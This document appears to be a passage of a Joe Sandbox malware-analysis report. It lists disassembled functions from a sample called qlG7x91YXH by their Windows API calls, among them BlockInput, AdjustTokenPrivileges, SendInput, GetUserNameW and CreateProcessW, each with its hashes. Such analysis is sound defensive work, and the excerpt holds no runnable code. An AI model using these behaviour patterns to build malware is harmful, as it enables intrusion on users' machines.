                                              • API String ID: 3429775523-0
                                              • Opcode ID: c0d62faa736ad645630bdc4a52cc38bca55737e20f1c5aff681907a7e5939a44
                                              • Instruction ID: 9662541c72d4aba8c22261e01715302077d187f33f2a46862c51e918b9708253
                                              • Opcode Fuzzy Hash: c0d62faa736ad645630bdc4a52cc38bca55737e20f1c5aff681907a7e5939a44
                                              • Instruction Fuzzy Hash: F7F04471940309FFEB00CFE08C89AAEBBBCEB08300F104561E500E2180E331AA488A60
                                              APIs
                                              • GetCurrentProcess.KERNEL32(00DA28E9,?,00D94CBE,00DA28E9,00E388B8,0000000C,00D94E15,00DA28E9,00000002,00000000,?,00DA28E9), ref: 00D94D09
                                              • TerminateProcess.KERNEL32(00000000,?,00D94CBE,00DA28E9,00E388B8,0000000C,00D94E15,00DA28E9,00000002,00000000,?,00DA28E9), ref: 00D94D10
                                              • ExitProcess.KERNEL32 ref: 00D94D22
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Process$CurrentExitTerminate
                                              • String ID:
                                              • API String ID: 1703294689-0
                                              • Opcode ID: 0866c6ba25b1b3235b232c8546cf679d086de961e2a44bbfebfb1c93427eec55
                                              • Instruction ID: 7e4130eac1d583336ff64bff8036f12baebadc461bc39853e4de04c3d6ec9ccd
                                              • Opcode Fuzzy Hash: 0866c6ba25b1b3235b232c8546cf679d086de961e2a44bbfebfb1c93427eec55
                                              • Instruction Fuzzy Hash: 2EE0B635010148AFCF15AF55DD09E583B69FB46791B248154FC059A123CB3ADD86CAA0
                                              APIs
                                              • GetUserNameW.ADVAPI32(?,?), ref: 00DCD28C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                               • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: NameUser
                                              • String ID: X64
                                              • API String ID: 2645101109-893830106
                                              • Opcode ID: 28b786f1c6a760b04be9fd9ed82f9ad2d5a7ba88e93fd0b89594763d8ea08185
                                              • Instruction ID: db86b83a2363d92ec6c0b6b090e1b744ec4c7990f5dad6df391d00afaaed0dd0
                                              • Opcode Fuzzy Hash: 28b786f1c6a760b04be9fd9ed82f9ad2d5a7ba88e93fd0b89594763d8ea08185
                                              • Instruction Fuzzy Hash: 04D0C9B480111DEECB94DB90DC88DD9F37CBB04305F200255F146A2040D73095898F20
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                               • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                              • Instruction ID: 4e534243624c4d7068f91b65c4ebaab6937bf1eea969b3979a6184ccd1600f52
                                              • Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                              • Instruction Fuzzy Hash: 99021D71E112199FDF14CFA9C8806ADFBF1EF48314F298169E819E7384D731AA41CBA4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                               • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Variable is not of type 'Object'.$p#
                                              • API String ID: 0-1086706999
                                              • Opcode ID: e2613d2cf136addd4e8ed153d91b417efcd62acd2a8f38237ebc28a40ddbee24
                                              • Instruction ID: d554c80a44267ec75086fb8986d51eac49912e7642cc9faa1765ba6afc364c4f
                                              • Opcode Fuzzy Hash: e2613d2cf136addd4e8ed153d91b417efcd62acd2a8f38237ebc28a40ddbee24
                                              • Instruction Fuzzy Hash: A4324670910219DFDF14DF94C981BEDBBB5EF05304F28905DE84AAB292E735AA46CB70
                                              APIs
                                                • Part of subcall function 00D89BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00D89BB2
                                                • Part of subcall function 00D89944: GetWindowLongW.USER32(?,000000EB), ref: 00D89952
                                              • GetParent.USER32(?), ref: 00DC73A3
                                              • NtdllDialogWndProc_W.NTDLL(?,00000133,?,?,?,?), ref: 00DC742D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                               • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: LongWindow$DialogNtdllParentProc_
                                              • String ID:
                                              • API String ID: 314495775-0
                                              • Opcode ID: bef26c25f4c8d86a1d9a0c5b1a0c936ed073e49974298d41a48fd43cf7e47f20
                                              • Instruction ID: b1e7fcce1dc56aff986a394ee491b3122e1fdd753858d004294469152b5d550f
                                              • Opcode Fuzzy Hash: bef26c25f4c8d86a1d9a0c5b1a0c936ed073e49974298d41a48fd43cf7e47f20
                                              • Instruction Fuzzy Hash: BE210134600101AFCF25AF69CC69EB93BA5EF4A370F1C0259F9A51B2A1C3318D51EB70
                                              APIs
                                              • FindFirstFileW.KERNEL32(?,?), ref: 00DE6918
                                              • FindClose.KERNEL32(00000000), ref: 00DE6961
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                               • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Find$CloseFileFirst
                                              • String ID:
                                              • API String ID: 2295610775-0
                                              • Opcode ID: 13cd64358aa74c4b2199927b2391f7689441f7b6a5654e6172612d86df0d7063
                                              • Instruction ID: f1de582bfcc7e2f913c13520d754c6ccbf7fcbe9515f747357063718bd0e4186
                                              • Opcode Fuzzy Hash: 13cd64358aa74c4b2199927b2391f7689441f7b6a5654e6172612d86df0d7063
                                              • Instruction Fuzzy Hash: C51190316146409FC710DF6AD884A1ABBE5FF85328F18C69DE4698F6A2D730EC45CBA1
                                              APIs
                                                • Part of subcall function 00D89BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00D89BB2
                                              • NtdllDialogWndProc_W.NTDLL(?,0000002B,?,?,?,?,?,?,?,00DC769C,?,?,?), ref: 00E09111
                                                • Part of subcall function 00D89944: GetWindowLongW.USER32(?,000000EB), ref: 00D89952
                                              • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 00E090F7
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                               • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: LongWindow$DialogMessageNtdllProc_Send
                                              • String ID:
                                              • API String ID: 1273190321-0
                                              • Opcode ID: e86d74596fda9d6f9bd708534cfd4aaeec6b9588e347b5ce78c4a0b664e36460
                                              • Instruction ID: 795e3271793efcbeb21138de68f3c25801a57f6bad53d9e4b2f57d9a383242dd
                                              • Opcode Fuzzy Hash: e86d74596fda9d6f9bd708534cfd4aaeec6b9588e347b5ce78c4a0b664e36460
                                              • Instruction Fuzzy Hash: 71012434201204BFDB20AF14DC59FA63BA6FF86324F100158F9412B2E2C7336C85CB20
                                              APIs
                                              • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00DF4891,?,?,00000035,?), ref: 00DE37E4
                                              • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00DF4891,?,?,00000035,?), ref: 00DE37F4
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                               • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: ErrorFormatLastMessage
                                              • String ID:
                                              • API String ID: 3479602957-0
                                              • Opcode ID: 79a98988c4d8816bee0d745875b42cf217f847a51d8835f0d7b5f71a1523971c
                                              • Instruction ID: 0edefd76fafe4bed0305437d30742cda62cd971dd24075474fe52021c2e75d8c
                                              • Opcode Fuzzy Hash: 79a98988c4d8816bee0d745875b42cf217f847a51d8835f0d7b5f71a1523971c
                                              • Instruction Fuzzy Hash: 0FF0E5B16052286AEB2027A78C4DFEB7AAEEFC4761F000265F509E3291D9609948C7B0
                                              APIs
                                              • ClientToScreen.USER32(?,?), ref: 00E09423
                                              • NtdllDialogWndProc_W.NTDLL(?,00000200,?,00000000,?,?,00000000,00000000,?,00DC776C,?,?,?,?,?), ref: 00E0944C
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                               • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: ClientDialogNtdllProc_Screen
                                              • String ID:
                                              • API String ID: 3420055661-0
                                              • Opcode ID: e88ca94ba1b6fd94392825610de6ae5d3a8556c10a03d10f04e453bec8723221
                                              • Instruction ID: 1ea7373cd757b3b3d5672ea9acfbf88e33650016d560b3d3a33750b5a93e9b6a
                                              • Opcode Fuzzy Hash: e88ca94ba1b6fd94392825610de6ae5d3a8556c10a03d10f04e453bec8723221
                                              • Instruction Fuzzy Hash: FCF03A76400218FFEF048F52DC49DAE7BB8FB44351F10415AF905B21A1D376AA95DB60
                                              APIs
                                              • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00DDB25D
                                              • keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 00DDB270
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                               • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: InputSendkeybd_event
                                              • String ID:
                                              • API String ID: 3536248340-0
                                              • Opcode ID: e91a643179127577aa8c5a536bde3c42f98a139398517c826399387e7661dddd
                                              • Instruction ID: 96a823cb0991fd309460c14064f4b38da210a44a244286576024d083f280afc3
                                              • Opcode Fuzzy Hash: e91a643179127577aa8c5a536bde3c42f98a139398517c826399387e7661dddd
                                              • Instruction Fuzzy Hash: 69F01D7580424DAFDB059FA1C805BAE7FB4FF08319F14800AF955A5191C379C6559FA4
                                              APIs
                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00DD11FC), ref: 00DD10D4
                                              • CloseHandle.KERNEL32(?,?,00DD11FC), ref: 00DD10E9
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                               • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: AdjustCloseHandlePrivilegesToken
                                              • String ID:
                                              • API String ID: 81990902-0
                                              • Opcode ID: 5a7ae42d57fba4470d2a891b80e44a240f1756529ef57232640f72f3f3de5d28
                                              • Instruction ID: 0fbb2c705fa46957dcce23864f8f43d16586543ffa24a737cd469e87bbb0730c
                                              • Opcode Fuzzy Hash: 5a7ae42d57fba4470d2a891b80e44a240f1756529ef57232640f72f3f3de5d28
                                              • Instruction Fuzzy Hash: D5E0BF72014611FEE7252B51FC05E7777A9EB04311B24892EF5A5905B1DB626CE0DB60
                                              APIs
                                              • GetWindowLongW.USER32(?,000000EC), ref: 00E09542
                                              • NtdllDialogWndProc_W.NTDLL(?,00000084,00000000,?,?,00DC76FB,?,?,?,?), ref: 00E0956C
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                               • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: DialogLongNtdllProc_Window
                                              • String ID:
                                              • API String ID: 2065330234-0
                                              • Opcode ID: cc5c178e57c9988af3e2f2327ef5d7bd3f6e88978186e0e0af97a78344dc2adb
                                              • Instruction ID: 93f77417c3a7dd801b2c41eeeb5b358928ec3ff80b6bbf545865f1aae74fcda4
                                              • Opcode Fuzzy Hash: cc5c178e57c9988af3e2f2327ef5d7bd3f6e88978186e0e0af97a78344dc2adb
                                              • Instruction Fuzzy Hash: 64E08670104214BBFB150F1AEC19FB93B14F700B91F104215F957A80E2D7B295D0D260
                                              APIs
                                              • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00DA6766,?,?,00000008,?,?,00DAFEFE,00000000), ref: 00DA6998
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                               • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: ExceptionRaise
                                              • String ID:
                                              • API String ID: 3997070919-0
                                              • Opcode ID: 74e4b672e2df45a8de248d6d7e85e94e8e1c4fe8c0b8f61d92eb076b70dc3f11
                                              • Instruction ID: 52b66fe9be60e234bf1cbb76c70e2f021c54f37ad46933e7aa4a7d8118a7e087
                                              • Opcode Fuzzy Hash: 74e4b672e2df45a8de248d6d7e85e94e8e1c4fe8c0b8f61d92eb076b70dc3f11
                                              • Instruction Fuzzy Hash: A4B11835610608DFD715CF28C48AB657BA0FF46364F2D8658E89ACF2E2C739E991CB50
Strings
Similarity
• API ID:
• String ID:
• API String ID: 0-3916222277
• Opcode ID: e9ae90f4be1abe80c7f906986c7d2212eee355f8f3234b6940904a31f1c9ac22
• Instruction ID: 3b03138f874bb8f8d768349b0c1771080a0988188947bdff6048a5dd16f1f40c
• Opcode Fuzzy Hash: e9ae90f4be1abe80c7f906986c7d2212eee355f8f3234b6940904a31f1c9ac22
• Instruction Fuzzy Hash: 9E1230719002299FDB14DF58C881BEEB7B5FF48710F1481AAE849EB255DB349A81DFA0
APIs
  • Part of subcall function 00D89BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00D89BB2
• NtdllDialogWndProc_W.NTDLL(?,00000112,?,?), ref: 00E0A38F
Similarity
• API ID: DialogLongNtdllProc_Window
• String ID:
• API String ID: 2065330234-0
• Opcode ID: c8a959689e9633ed450157d0d2d1ad3fe7c2696649e951345ea31563a9510f38
• Instruction ID: b9aad2c580c0b3421c11735fc9bad369c9a628d94cf4c747f8f2d2d2e8adc60a
• Opcode Fuzzy Hash: c8a959689e9633ed450157d0d2d1ad3fe7c2696649e951345ea31563a9510f38
• Instruction Fuzzy Hash: 4B1156302007596AFB391B28CC1AFBC3680DB81724F289338FA113A1E1C7685DC0C262
APIs
  • Part of subcall function 00D89944: GetWindowLongW.USER32(?,000000EB), ref: 00D89952
• CallWindowProcW.USER32(?,?,00000020,?,?), ref: 00E087F3
Similarity
• API ID: Window$CallLongProc
• String ID:
• API String ID: 4084987330-0
• Opcode ID: f5e5104734482e3f7ec9af923ddc4257cabb2f0af563fd8524b30fdf74e8b3b6
• Instruction ID: a9d68b91c2b97587a0568f78068853eac506e058395332db46483e9c7ef86632
• Opcode Fuzzy Hash: f5e5104734482e3f7ec9af923ddc4257cabb2f0af563fd8524b30fdf74e8b3b6
• Instruction Fuzzy Hash: 13F04935104108EFCF05AF55ED54CB93BAAEB09360B548515F991AA6A1CB32ACE0EFA0
APIs
  • Part of subcall function 00D89BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00D89BB2
  • Part of subcall function 00D8912D: GetCursorPos.USER32(?), ref: 00D89141
  • Part of subcall function 00D8912D: ScreenToClient.USER32(00000000,?), ref: 00D8915E
  • Part of subcall function 00D8912D: GetAsyncKeyState.USER32(00000001), ref: 00D89183
  • Part of subcall function 00D8912D: GetAsyncKeyState.USER32(00000002), ref: 00D8919D
• NtdllDialogWndProc_W.NTDLL(?,00000204,?,?,00000001,?,?,?,00DC7818,?,?,?,?,?,00000001,?), ref: 00E08AF8
Similarity
• API ID: AsyncState$ClientCursorDialogLongNtdllProc_ScreenWindow
• String ID:
• API String ID: 2356834413-0
• Opcode ID: 2df7b8d715e3227c6d8412f27552c4ae166c87a4ae7ec934da99bbb7b4c45fd9
• Instruction ID: 4082cfffb989165ecfeda6da478f3edd29f22a8611e2602d972fc6b1cc87b423
• Opcode Fuzzy Hash: 2df7b8d715e3227c6d8412f27552c4ae166c87a4ae7ec934da99bbb7b4c45fd9
• Instruction Fuzzy Hash: C5F08230200229ABEF14AF55DC1AABA3F65EB40790F000115F9562A192CBB2A9E0DBE4
APIs
  • Part of subcall function 00D89BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00D89BB2
• NtdllDialogWndProc_W.NTDLL(?,00000006,?,?,?), ref: 00D89096
Similarity
• API ID: DialogLongNtdllProc_Window
• String ID:
• API String ID: 2065330234-0
• Opcode ID: 11e254bd7cba40264e4f8811e20998fda4bacefd157322c05e3f0a2ce1112987
• Instruction ID: bdad2c0653616213ad1b162f60a7d39365263191a3a6685b19bc353362d8e1f6
• Opcode Fuzzy Hash: 11e254bd7cba40264e4f8811e20998fda4bacefd157322c05e3f0a2ce1112987
• Instruction Fuzzy Hash: EAF05434600218AFDF189F16D8656753762FB86351F24415CF8521A2E0C73399D1D760
APIs
• BlockInput.USER32(00000001), ref: 00DEEABD
Similarity
• API ID: BlockInput
• String ID:
• API String ID: 3456056419-0
• Opcode ID: b6454a49fdd6554605e6a8f31cf14e31c6261dbe2f474354d2379939bfe20e65
• Instruction ID: 67c3157f258b1b80a09b76ac6a67b2d7f66bda428fa2641fb9d43a3863d31987
• Opcode Fuzzy Hash: b6454a49fdd6554605e6a8f31cf14e31c6261dbe2f474354d2379939bfe20e65
• Instruction Fuzzy Hash: B0E01A312102049FC710EF6AD804E9AF7E9EF98764F00842AFC49D7291EB71E8408BB0
APIs
• NtdllDialogWndProc_W.NTDLL(?,00000232,?,?), ref: 00E093C0
Similarity
• API ID: DialogNtdllProc_
• String ID:
• API String ID: 3239928679-0
• Opcode ID: e3ef9be965e69dac58cd2d1a9cb6ef774647aae681970de239d56581fbfa68f4
• Instruction ID: 266c753d65d2523807a941f8756c34119a0feffbc5103adbe8a5d86e30a26acc
• Opcode Fuzzy Hash: e3ef9be965e69dac58cd2d1a9cb6ef774647aae681970de239d56581fbfa68f4
• Instruction Fuzzy Hash: 9FF06D31200294BFEB21DF58EC09FC67BA5EB0A360F144148FA25372E2CB7179A0DB60
APIs
  • Part of subcall function 00D89BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00D89BB2
• NtdllDialogWndProc_W.NTDLL(?,00000007,?,00000000,00000000,?,?), ref: 00D890D5
Similarity
• API ID: DialogLongNtdllProc_Window
• String ID:
• API String ID: 2065330234-0
• Opcode ID: 1a2f8a3d6f9ce4fad0a1ba8af9b6caaa56a9fd93850216d7b34b83027d31ffdb
• Instruction ID: 1753421feb9f4e75e8ef8f51c2625d7e0fb9dd0cf9855fbf75e08753a21f7a74
• Opcode Fuzzy Hash: 1a2f8a3d6f9ce4fad0a1ba8af9b6caaa56a9fd93850216d7b34b83027d31ffdb
• Instruction Fuzzy Hash: CFE01235600204FFDF15AF91EC66E647B26FB89350F148158FA552A2A1CB33B9A2DB60
APIs
• NtdllDialogWndProc_W.NTDLL(?,00000053,?,?,?,00DC7723,?,?,?,?,?,?), ref: 00E093F6
  • Part of subcall function 00E08172: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00E43018,00E4305C), ref: 00E081BF
